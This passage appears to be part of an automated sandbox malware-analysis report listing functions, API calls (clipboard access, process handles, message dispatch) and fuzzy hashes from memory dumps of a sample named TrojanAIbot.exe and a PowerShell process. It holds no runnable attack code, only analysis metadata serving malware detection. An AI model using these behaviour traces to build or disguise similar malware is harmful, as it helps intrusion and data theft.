Instruction Fuzzy Hash: 55E09A3490A28ACFCB06DF75E0895ADBFB0EF47200B0485EDDC869B652EA304C45CF80

Function 06B5F470 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: b4045b1b23acd5ca94506feb4f963882766f2139a32c003d767a145fcaf23bdf
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: A2D062B0D042099F8780DFADC94156DFBF4EB48200F5085AA8919D7301E7315612CFD1

Function 06B57EA0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a4949cfee56b8323685a14f83a53152fd9a373e5393e85f9f25b2b37841ecd
Instruction ID: b6cb6dc4a5ccc85bb754fa9096874ac2d8cc36cc121b8387f5f1f81d5a0f14fd
Opcode Fuzzy Hash: 33a4949cfee56b8323685a14f83a53152fd9a373e5393e85f9f25b2b37841ecd
Instruction Fuzzy Hash: 73D0A72A30D3D05FD70B833548E91567F318B92000B8B41FFC442CE5E3C418480AC312

Function 06B58748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceea61e73180e3db7e566a5d14ad2d36a2e4e8f5a2dae91ac713fd9eaac6840d
Instruction ID: def9db315d8edc2097a82f06d20d4031827fe1d0d7d35143d40d9b3ce8d6519b
Opcode Fuzzy Hash: ceea61e73180e3db7e566a5d14ad2d36a2e4e8f5a2dae91ac713fd9eaac6840d
Instruction Fuzzy Hash: 0AD06231905109CBCB08AB65F85E4BD7B74FA14301F41415ED91752191DE315A96CAC5

Function 06B58810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2f6de3d9e795acfdf34e4c48f045ec924d8309b1a58588e851ef344d996aac5
Instruction ID: 5f33af052946e3a1de61810ec65a23ee0ac250042d69f566c901c0a2017bfe17
Opcode Fuzzy Hash: d2f6de3d9e795acfdf34e4c48f045ec924d8309b1a58588e851ef344d996aac5
Instruction Fuzzy Hash: EFD01734A0920ADF8B48EFA5E44A86EBBB4EB45200F00816DDD0A93342EA305C41CBC1

Function 06B57932 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a79695e41b6ae4d0c9c7347c63f0c34871195ad4df8ee5ca06b8b6c912116806
Instruction ID: 5bb72341910e3e67141cac14bfac1a9edc8c40a2f6b88fdcdbbb8e59dc7cc082
Opcode Fuzzy Hash: a79695e41b6ae4d0c9c7347c63f0c34871195ad4df8ee5ca06b8b6c912116806
Instruction Fuzzy Hash: A3D0C93454D3C4AFC7579F7894948193F70AE4313532985EFD99A8F1B7CE26848ACB06

Function 06B57940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a39091dba7e4cd38e24e1020437989d9d958f8eef98ac81f08455dc1bace2231
Instruction ID: 5a177bc5bd4eff87885fcd8c9824e28c53e22bbadb05b03f5d159f37aa4d9597
Opcode Fuzzy Hash: a39091dba7e4cd38e24e1020437989d9d958f8eef98ac81f08455dc1bace2231
Instruction Fuzzy Hash: B9B09230044708CFC2486F79A4049157329EB4522A39084ECE91E0A296CE36E889CE45

Non-executed Functions

Function 07671BE0 Relevance: 9.2, Strings: 7, Instructions: 414COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07671FEB
4']q, xrefs: 07671F95
4']q, xrefs: 07671C86
tP]q, xrefs: 07671FDF
4']q, xrefs: 07671F89
pigj, xrefs: 07671C73
4']q, xrefs: 07671C92

Memory Dump Source

Source File: 0000000E.00000002.2318912479.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7670000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$pigj$tP]q$tP]q
API String ID: 0-1877703305
Opcode ID: 0d9b6281b77f2e1f8fb6fd20e575731bdab3e33fbb023b4fe210b2a2f1939530
Instruction ID: fb19d029eeedb53096b740cdb3229c44993bf30109df2c838d3cdff9b2aaa162
Opcode Fuzzy Hash: 0d9b6281b77f2e1f8fb6fd20e575731bdab3e33fbb023b4fe210b2a2f1939530
Instruction Fuzzy Hash: 7ED16BB1B0420ACFC7288B7D94506A6BBF6EFC6251F18C47BC4568B355DB35C846CBA1

Function 07670568 Relevance: 6.7, Strings: 5, Instructions: 418COMMON

Download Yara Rule

Strings

4']q, xrefs: 076705F6
4']q, xrefs: 07670962
4']q, xrefs: 0767096E
fbq, xrefs: 0767094B
4']q, xrefs: 076705EC

Memory Dump Source

Source File: 0000000E.00000002.2318912479.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7670000_powershell.jbxd

Similarity

API ID:
String ID: fbq$4']q$4']q$4']q$4']q
API String ID: 0-2283484764
Opcode ID: a6df30e0486efcad144143f38b4ad40fa7aa3584939f72ca4e44204f232de224
Instruction ID: 959a1f171045a299762f51084bf2c65567bd3e4b968c70e8dcd280520090c1f5
Opcode Fuzzy Hash: a6df30e0486efcad144143f38b4ad40fa7aa3584939f72ca4e44204f232de224
Instruction Fuzzy Hash: E6D137B07042459FDB159B78942076ABFA6EFC2290F14C4BAD546CB392DA35DC42CBF2

Function 06B57A21 Relevance: 5.2, Strings: 4, Instructions: 242COMMON

Download Yara Rule

Strings

`^q, xrefs: 06B57CC2
`^q, xrefs: 06B57C44
`^q, xrefs: 06B57BA2
`^q, xrefs: 06B57B23

Memory Dump Source

Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: 2c56da318326e4a68aa1f5680577afa539c785c642749787ffb16d6f57280096
Instruction ID: 1132036cb069368839bc557a9060a82429f578ce433c6be8ceb1aa20685348c1
Opcode Fuzzy Hash: 2c56da318326e4a68aa1f5680577afa539c785c642749787ffb16d6f57280096
Instruction Fuzzy Hash: E0B1B474E002099FCB55DFA9D990A9DFBF6FF88300F208669D819AB355DB34A905CF90

Function 06B57A30 Relevance: 5.2, Strings: 4, Instructions: 234COMMON

Download Yara Rule

Strings

`^q, xrefs: 06B57CC2
`^q, xrefs: 06B57C44
`^q, xrefs: 06B57BA2
`^q, xrefs: 06B57B23

Memory Dump Source

Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: 6aa344453352923138a21f53a6de4a17bb5391f221730c09dbf51aa95cea2af5
Instruction ID: 775d56e7847585fbfef166f652611425234f80836a0a30acda5b9bcee09e37e5
Opcode Fuzzy Hash: 6aa344453352923138a21f53a6de4a17bb5391f221730c09dbf51aa95cea2af5
Instruction Fuzzy Hash: 71B19374E002099FCB55DFA9D990A9DFBF6FF88300F208669D819AB354DB34A945CF90

Function 06B57200 Relevance: 5.2, Strings: 4, Instructions: 213COMMON

Download Yara Rule

Strings

`^q, xrefs: 06B57CC2
`^q, xrefs: 06B57C44
`^q, xrefs: 06B57BA2
`^q, xrefs: 06B57B23

Memory Dump Source

Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: 7a8e5113ea8dc38fd8212af18dc5bc8cc6339dd85c4f1b3d4606f6afbdbfcd54
Instruction ID: b1e07f06f53220a9a28260d376083a286ec0da90bc877d67c40291e0e8879794
Opcode Fuzzy Hash: 7a8e5113ea8dc38fd8212af18dc5bc8cc6339dd85c4f1b3d4606f6afbdbfcd54
Instruction Fuzzy Hash: 0FA1A174E002099FCB55DFA9D990A9DFBF6FF48300F20866AD819AB355DB34A905CF90

Function 07675798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 076757F4
$]q, xrefs: 076757AA
$]q, xrefs: 076757C6
$]q, xrefs: 07675800

Memory Dump Source

Source File: 0000000E.00000002.2318912479.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7670000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: ce03ac44dff88147dc5f178bbf151930df2ef477c2674e8c9709309d67585cd0
Instruction ID: 3b8583da441010a0fe0ab21829028beb3b3b42302684c24079ae8efc5862c384
Opcode Fuzzy Hash: ce03ac44dff88147dc5f178bbf151930df2ef477c2674e8c9709309d67585cd0
Instruction Fuzzy Hash: 94213BB1314316DBDB28557E8840B37BBDAAFC1791F24886A994BCB383DD79C852C361

Function 07670309 Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

4']q, xrefs: 0767037F
4']q, xrefs: 07670373
$]q, xrefs: 07670352
$]q, xrefs: 0767035E

Memory Dump Source

Source File: 0000000E.00000002.2318912479.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7670000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: edc3664c11e3a702bf2a38600366694afbd38cbdad61ed2eb7ad0479d005dbac
Instruction ID: 2306da942b9ab258439fb62290aead0f89f89d04ff1f348b8cd9c1e0e913f7a0
Opcode Fuzzy Hash: edc3664c11e3a702bf2a38600366694afbd38cbdad61ed2eb7ad0479d005dbac
Instruction Fuzzy Hash: 8501A7707093469FC72A163C58602166BB6AFC3A60B2945EBC495DB357CD288C06C7B6

Analysis Process: TrojanAIbot.exePID: 1088, Parent PID: 6788COMMON

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	90
Total number of Limit Nodes:	11

Executed Functions

Function 05E43360 Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 8bf5218267cbac6b864f94e86c19868b8ec399313bd7f0266eb49edd05fbeb68
Instruction ID: f297a90222ec53d41e689868118c8aef1281c9c7364510775d2ad790e6c6eaae
Opcode Fuzzy Hash: 8bf5218267cbac6b864f94e86c19868b8ec399313bd7f0266eb49edd05fbeb68
Instruction Fuzzy Hash: 2BF15F31E00209CFEB14DFA9D948BADBBF2BF48304F159958E445AB295DB74E985CF80

Function 029CF6BA Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 029CF73E
GetCurrentThread.KERNEL32 ref: 029CF77B
GetCurrentProcess.KERNEL32 ref: 029CF7B8
GetCurrentThreadId.KERNEL32 ref: 029CF811

Memory Dump Source

Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 461027608d7c21fec9e6b86070e395b8f60e748a3280d92b123e29bea52028ea
Instruction ID: f468626fa17bad034333c6d9f054ecd0ef8fb89ffac28a1a17d7fdc04bb68c5e
Opcode Fuzzy Hash: 461027608d7c21fec9e6b86070e395b8f60e748a3280d92b123e29bea52028ea
Instruction Fuzzy Hash: 125164B0D003098FDB54DFA9D648BAEBBF6FF48304F208459E519A7360D7389944CBA6

Function 029CF6C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 029CF73E
GetCurrentThread.KERNEL32 ref: 029CF77B
GetCurrentProcess.KERNEL32 ref: 029CF7B8
GetCurrentThreadId.KERNEL32 ref: 029CF811

Memory Dump Source

Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a506690ad263700250cf5f427087ff167b9cbd4a77989969eba75915a07c673c
Instruction ID: d1b9b38b390a6520445463f0cd6a1fbfa13f0216258761ac513d0642bd81c5f7
Opcode Fuzzy Hash: a506690ad263700250cf5f427087ff167b9cbd4a77989969eba75915a07c673c
Instruction Fuzzy Hash: 005166B09003098FDB14DFA9D548BAEBBF6FF48314F20845DE519A7360D7789944CB66

Function 029CD418 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 029CD67E

Memory Dump Source

Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f9a40d1e8bbfae52c19a3b9123c687dceb54176b3e63510705080501cac97951
Instruction ID: 892b4fd8b083e51cf74ec9531a1bcaa2beb114b8cdf20af76ad6971e5fcb600e
Opcode Fuzzy Hash: f9a40d1e8bbfae52c19a3b9123c687dceb54176b3e63510705080501cac97951
Instruction Fuzzy Hash: 4A815670A00B458FD724DF29D0547AABBF5FF88304F10892ED48ADBA50D774E846CBA1

Function 05E4483C Relevance: 1.6, APIs: 1, Instructions: 75
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 05E448D0

Memory Dump Source

Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: abeaee383844454f2064abbe9e87688ab4e989e028ff466050d8662326a487f4
Instruction ID: 0187b5309ad09a92dcea822639365e47791b6c78e133417a3764977344535fcc
Opcode Fuzzy Hash: abeaee383844454f2064abbe9e87688ab4e989e028ff466050d8662326a487f4
Instruction Fuzzy Hash: 993111B0A01249DFDB10CF99D984BCEBBF5BB48304F248069E544AB390D7B46945CF65

Function 05E424CC Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 05E448D0

Memory Dump Source

Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 5f7429b6e92af1b61be750993255479166c03fd724533e5b6de13eefa6116d6c
Instruction ID: 3f7b2c3b1572889732b95acc90eb9a5cfcebd0f9b3f33f85c3d5e193038836fa
Opcode Fuzzy Hash: 5f7429b6e92af1b61be750993255479166c03fd724533e5b6de13eefa6116d6c
Instruction Fuzzy Hash: 8C311FB0A0524DDFDB10CF99D984BDEBBF5BB48304F208069E544AB290D7B46944CFA5

Function 029CFD10 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029CFD97

Memory Dump Source

Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 10224c0966dad6878f26dd7d62310428781efd262f0d1b0ec3ee10da9d07be1b
Instruction ID: 095fdd2ce1f723017df264c81e250a6dab6514c2c9955cd6db4688fab4f4b81a
Opcode Fuzzy Hash: 10224c0966dad6878f26dd7d62310428781efd262f0d1b0ec3ee10da9d07be1b
Instruction Fuzzy Hash: 1A21C6B59002489FDB10CF9AD984ADEBFF9FF48310F14841AE914A3350D378A944CFA5

Function 029CFD0A Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029CFD97

Memory Dump Source

Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a432cd824381398097fa32c31eab29c61be09ee28fa62449cb11b3ad4810b925
Instruction ID: 9dfd8025c36574cc4703da10b21a0c55c0d0453b56fd6d54cca76cc095013775
Opcode Fuzzy Hash: a432cd824381398097fa32c31eab29c61be09ee28fa62449cb11b3ad4810b925
Instruction Fuzzy Hash: A321D4B5D002489FDB10CFA9D584AEEBBF9EF08310F14841AE914A3310D378A940CFA5

Function 05E42299 Relevance: 1.6, APIs: 1, Instructions: 60
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05E43687), ref: 05E44125

Memory Dump Source

Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 57e1888db10e376231c891f730eeb888e5df1c577232de30378c884c3733a90c
Instruction ID: ced21bc85b925a640d51a6aa0fc42105937f990ef59c8162db04c602b01c411f
Opcode Fuzzy Hash: 57e1888db10e376231c891f730eeb888e5df1c577232de30378c884c3733a90c
Instruction Fuzzy Hash: C42164B6C043588FCB10DF9AE880BDEBBF4EF48314F10806AE558A3240D338A904CFA5

Function 029CD618 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 029CD67E

Memory Dump Source

Source File: 00000012.00000002.4509569807.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_29c0000_TrojanAIbot.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7b9d8fee69724cae35989e46f707e75f2f8f3921f738da3f49c396356d0c1879
Instruction ID: 39f7cf599965a95ae7d16dc6dd193708834539717e665a8f427d6f39579ff443
Opcode Fuzzy Hash: 7b9d8fee69724cae35989e46f707e75f2f8f3921f738da3f49c396356d0c1879
Instruction Fuzzy Hash: 3B1110B5C003498FCB10DF9AC944ADEFBF8EF88314F20842AD828A7210C379A545CFA5

Function 05E421B0 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 05E4319D

Memory Dump Source

Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5304454067a7f8b326445268fb4714c228f8040fb16ddba83d2eef4533f5ca60
Instruction ID: 06ef8b4b1677ff62e7e866d598600875a9104f79b02b8c14c6e0e36b2877c376
Opcode Fuzzy Hash: 5304454067a7f8b326445268fb4714c228f8040fb16ddba83d2eef4533f5ca60
Instruction Fuzzy Hash: 8A1145B1900348CFCB20DF9AD448BDEBBF4EB48310F208859D519A3300C378A984CFA4

Function 05E43141 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05E4319D

Memory Dump Source

Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: aaca7034b8dd09da41df98d9953cf41ba92f33bdbb1328a13fd802cc7ca67cdf
Instruction ID: fc0c7fcfce9ef444a720d26b27316621ddabeedd5856f7206f9b171ca3f233d9
Opcode Fuzzy Hash: aaca7034b8dd09da41df98d9953cf41ba92f33bdbb1328a13fd802cc7ca67cdf
Instruction Fuzzy Hash: 5D1115B19003489FCB20DF9AD945BDEBBF8EB48324F248819D519A3310C379A584CFA5

Function 05E4225C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05E43687), ref: 05E44125

Memory Dump Source

Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 5b1e00c757872b1438814d19242000464d35565ac216bedabfb8f21618ac9b9c
Instruction ID: 612b629e084a353f4b7f6e458a96970d0c3e06b1e678bf9edbfa144437735b32
Opcode Fuzzy Hash: 5b1e00c757872b1438814d19242000464d35565ac216bedabfb8f21618ac9b9c
Instruction Fuzzy Hash: A111E0B5D046488FDB20DF9AD844BDEFBF4EB48314F10846AE969A3350D378A544CFA5

Function 05E440C1 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05E43687), ref: 05E44125

Memory Dump Source

Source File: 00000012.00000002.4517785491.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5e40000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 2a927a3485add19383371406ad62688d4dc3944c427377f378162b70b5407e1a
Instruction ID: a99608a6e04077c2381bc6f5f5fd8849e27c3ae1d474ba1a74f4af06617c0960
Opcode Fuzzy Hash: 2a927a3485add19383371406ad62688d4dc3944c427377f378162b70b5407e1a
Instruction Fuzzy Hash: 6B11EAB5D046488FDB10CF9AE944BDEBBF4AB48214F10851AE528B3650D378A644CFA5

Function 0105D704 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4508684769.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_105d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b4ddc9f88e3b27a4dce028fc747c286bb3e066858beb7fa264f20442d5b593
Instruction ID: 3baaac5a7a7c15261f8229cf92644a2e0e47d3bd914a83c5de159e44f88c9657
Opcode Fuzzy Hash: 25b4ddc9f88e3b27a4dce028fc747c286bb3e066858beb7fa264f20442d5b593
Instruction Fuzzy Hash: 0D213671500288DFDB45DF94D9C0F1BBFA5FB84314F2085AADD490B256D336D446C7A1

Function 0106D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4508907748.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_106d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3da76947efcc7a05d7ab383779437bc7ad353ea0fe659e78bc07b98ba54bdf
Instruction ID: 213bfc41fd36fdc1d8a391fd2463b6ae380031e8276a3c698f80e98815db1d95
Opcode Fuzzy Hash: da3da76947efcc7a05d7ab383779437bc7ad353ea0fe659e78bc07b98ba54bdf
Instruction Fuzzy Hash: 7F210371604200DFEB15DF68D580B26BFA9EB88314F20C5A9E9890B256C33AD406CBA1

Function 0106D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4508907748.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_106d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d80340c3b6835dac0e4e4590b60cdbc84b3fa43a5c1abd3d0728ddf13d9253
Instruction ID: 6eb8e8c6954ce36bf43b1bbecdf08ea2d8189d26e201b43151ae2414e810ca3a
Opcode Fuzzy Hash: 05d80340c3b6835dac0e4e4590b60cdbc84b3fa43a5c1abd3d0728ddf13d9253
Instruction Fuzzy Hash: E82165755093808FD713CF64D594715BFB1EB46214F28C5DAD8898F667C33A980ACB62

Function 0105D6FF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4508684769.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_105d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 4defefe49b592940b0a7a3ca6e07302a4a531734a06f8feb2c58b7c6d02d9900
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: AF11CD76404284CFDB42CF54D9C4B16BFA2FB84214F2485AADD490A656C336D45ACBA2

Function 0105D07D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4508684769.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_105d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 223d2df3eed655d56bd0f728ed773ab5f4b2a04db855d207f4cd2b05c8ccad95
Instruction ID: bd9a08e0a76d13228d45b7b1f378e0c02058e1f708b070080b84332a55d44ba9
Opcode Fuzzy Hash: 223d2df3eed655d56bd0f728ed773ab5f4b2a04db855d207f4cd2b05c8ccad95
Instruction Fuzzy Hash: 1C01F7311043009AE7A09BA9CC84B67FFDCEF453A0F18C56BFD884B296C2799842CB71

Function 0105D07C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

